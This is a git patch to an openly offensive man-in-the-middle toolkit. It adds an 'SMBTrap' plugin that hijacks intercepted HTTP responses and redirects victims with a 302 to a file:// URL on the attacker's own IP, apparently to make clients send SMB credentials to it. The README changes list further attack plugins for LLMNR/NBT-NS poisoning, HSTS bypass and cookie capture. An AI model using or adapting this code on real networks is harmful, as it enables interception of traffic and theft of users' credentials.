From c2354b9b6340f733012e184bbb442ede1ecb5184 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 2 Jun 2015 23:54:33 +0200 Subject: [PATCH] Merged the SMBTrap plugin to master and relative code changes --- README.md | 3 +++ core/sslstrip/ServerConnection.py | 14 +++++++++++++- plugins/SMBTrap.py | 24 ++++++++++++++++++++++++ plugins/plugin.py | 7 +++++++ 4 files changed, 47 insertions(+), 1 deletion(-) create mode 100644 plugins/SMBTrap.py diff --git a/README.md b/README.md index 3a43c32..c09f4b7 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@ Contact me at: Available plugins ================= +- ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients - ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser - ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner - ```SSLstrip+``` - Partially bypass HSTS @@ -36,6 +37,8 @@ Available plugins Changelog ========= +- Added the ```SMBTrap``` plugin + - Config file now updates on the fly! - ```SessionHijacker``` is replaced with ```Ferret-NG```, captures cookies and starts a proxy that will feed them to connected clients diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 74868f4..8e9525c 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -72,7 +72,12 @@ class ServerConnection(HTTPClient): def sendRequest(self): if self.command == 'GET': try: - mitmf_logger.info("{} [type:{} os:{}] Sending Request: {}".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0], self.headers['host'])) + + if ('Unknown' in self.clientInfo[0]) or ('Unknown' in self.clientInfo[1]): + mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host'])) + else: + mitmf_logger.info("{} [type:{} os:{}] Sending Request: {}".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0], self.headers['host'])) + except Exception as e: mitmf_logger.debug("[ServerConnection] Unable to parse UA: {}".format(e)) mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host'])) @@ -120,6 +125,13 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): + + values = self.plugins.hook() + + version = values['version'] + code = values['code'] + message = values['message'] + mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) diff --git a/plugins/SMBTrap.py b/plugins/SMBTrap.py new file mode 100644 index 0000000..aba0d5d --- /dev/null +++ b/plugins/SMBTrap.py @@ -0,0 +1,24 @@ +import logging +import random +import string +from plugins.plugin import Plugin +from core.utils import SystemConfig + +mitmf_logger = logging.getLogger("mitmf") + +class SMBTrap(Plugin): + name = "SMBTrap" + optname = "smbtrap" + desc = "Exploits the SMBTrap vulnerability on connected clients" + version = "1.0" + has_opts = False + + def initialize(self, options): + self.ourip = SystemConfig.getIP(options.interface) + + def serverResponseStatus(self, request, version, code, message): + return {"request": request, "version": version, "code": 302, "message": "Found"} + + def serverHeaders(self, response, request): + mitmf_logger.info("{} [SMBTrap] Trapping request to {}".format(request.client.getClientIP(), request.headers['host'])) + response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8))) \ No newline at end of file diff --git a/plugins/plugin.py b/plugins/plugin.py index 0d5a324..053adc4 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -12,6 +12,7 @@ class Plugin(ConfigWatcher, object): optname = "generic" tree_info = list() desc = "" + version = "0.0" has_opts = False def initialize(self, options): @@ -41,6 +42,12 @@ class Plugin(ConfigWatcher, object): ''' pass + def serverResponseStatus(self, request, version, code, message): + ''' + Handles server response HTTP version, code and message + ''' + return {"request": request, "version": version, "code": code, "message": message} + def serverResponse(self, response, request, data): ''' Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)